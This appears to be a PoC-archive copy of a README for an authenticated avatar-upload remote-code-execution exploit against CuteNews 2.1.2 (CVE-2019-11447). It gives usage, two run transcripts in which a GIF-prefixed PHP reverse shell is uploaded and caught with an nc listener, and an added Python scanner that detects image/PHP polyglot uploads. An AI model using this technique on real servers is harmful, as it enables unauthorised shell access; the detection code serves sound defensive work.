Related vulnerability
Title:
Duplicate identifier
(CVE-2019-11447)
Description: CutePHP CuteNews is a news management system. It provides search, file upload management, access control, backup and restore, and other features. "Deprecated": do not use this identifier. Reason: this identifier duplicates CNNVD-201110-126; all users of CNNVD identifiers should refer to CNNVD-201110-126. To prevent accidental use, all information under this identifier has been deleted.
Description
Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)
Introduction
# CVE-2019-11447 Exploit/PoC - CuteNews 2.1.2 Avatar upload RCE (Authenticated)
> Exploit Code for [CVE-2019-11447](https://nvd.nist.gov/vuln/detail/CVE-2019-11447) aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)
Exploit Links:
Expected outcome: log in to or register an account, prepend .gif magic bytes to a user-selected PHP file, upload it as an avatar, and trigger it to achieve Remote Code Execution.
Intended only for educational use and testing in corporate environments.
This exploit was tested on Python 3.8.6.
### Usage
```shell
cfx: ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]
CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL CuteNews URL (Example: http://127.0.0.1)
-u USERNAME, --username USERNAME
Username to Login/Register
-p PASSWORD, --password PASSWORD
Password to Login/Register
-e EMAIL, --email EMAIL
Email to Login/Register
Exploit Usage :
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticon.net
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y
```
#### User Inputs
This exploit expects four arguments to run initially:
- **-l** : CuteNews URL
- **-u** : Username required to Login/Register
- **-p** : Password required to Login/Register
- **-e** : Email required to Login/Register
Additional required user inputs:
- **Select your PHP file ->** Here the user specifies the PHP file to be uploaded; it can be **any** PHP file, for example PHP info or a PHP reverse shell. If the PHP file is located in the same directory as the exploit, the user can just specify the file name:
Example: `[^] Select your PHP file -> rev.php`
Otherwise, the user needs to specify the location of the PHP file:
Example: `[^] Select your PHP file -> ~/Downloads/rev.php`
- **Press y/n to trigger reverse shell ->** Here, if the user has uploaded a PHP reverse shell, they can choose whether to trigger it by answering y/n.
Either way the exploit is designed to print out the uploaded file location for further use.
#### Exploit Execution
- Scenario 1 > Logging in with existing credentials and getting a reverse shell:
```shell
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
```
#### Shell
```shell
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
```
- Scenario 2 > Registering a new user and getting a reverse shell:
```shell
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticons.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
```
#### Shell
```shell
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
```
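An added defensive check, not part of the original exploit or of CuteNews: the PoC above gets past an image check by prepending GIF magic bytes to a PHP file, and a scan of the uploads directory (here run over constructed sample files in a temporary folder) catches exactly that file shape, image magic bytes followed by a PHP open tag, or an executable extension stored under the web root. The extension list and file layout are assumptions, not CuteNews's own configuration.

```python
import re
import tempfile
from pathlib import Path

# Leading magic bytes of the image formats an avatar upload would accept.
IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
}
# Assumed: extensions a typical PHP web server would execute inside a web root.
EXEC_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def image_type(data: bytes):
    """Return the image format implied by the leading magic bytes, or None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def classify(path: Path) -> list:
    """List the reasons a stored upload is suspicious; an empty list means clean."""
    data = path.read_bytes()
    reasons = []
    if path.suffix.lower() in EXEC_EXT:
        reasons.append("executable extension in upload directory")
    if image_type(data) and PHP_TAG.search(data):
        reasons.append("image magic bytes followed by PHP open tag (polyglot)")
    return reasons


def scan_uploads(directory: Path) -> dict:
    """Map each suspicious file name in the directory to its reasons."""
    results = ((p.name, classify(p)) for p in sorted(directory.iterdir()) if p.is_file())
    return {name: reasons for name, reasons in results if reasons}


def demo() -> dict:
    """Scan a constructed uploads folder shaped like the scenario in this README."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        # constructed: a genuine-looking avatar, GIF header and no code
        (base / "avatar_alice_alice.gif").write_bytes(b"GIF89a" + b"\x00" * 32)
        # constructed: the PoC's shape, GIF magic bytes prepended to PHP source
        (base / "avatar_cold_cold.php").write_bytes(b"GIF89a<?php echo 'polyglot'; ?>")
        # constructed: image extension, but the body still carries a PHP tag
        (base / "banner.png").write_bytes(b"\x89PNG\r\n\x1a\n<?= 'x' ?>")
        return scan_uploads(base)
```

The same `classify` check can run at upload time before the file is written, which is where the avatar handler should have rejected it.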
## Reference
- <https://nvd.nist.gov/vuln/detail/CVE-2019-11447>
File snapshot
[4.0K] /data/pocs/fdc82d593fd79c5c036ee120438607388df29ca5
├── [6.5K] exploit.py
├── [4.7K] README.md
└── [5.4K] rev.php
0 directories, 3 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source has gone offline or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.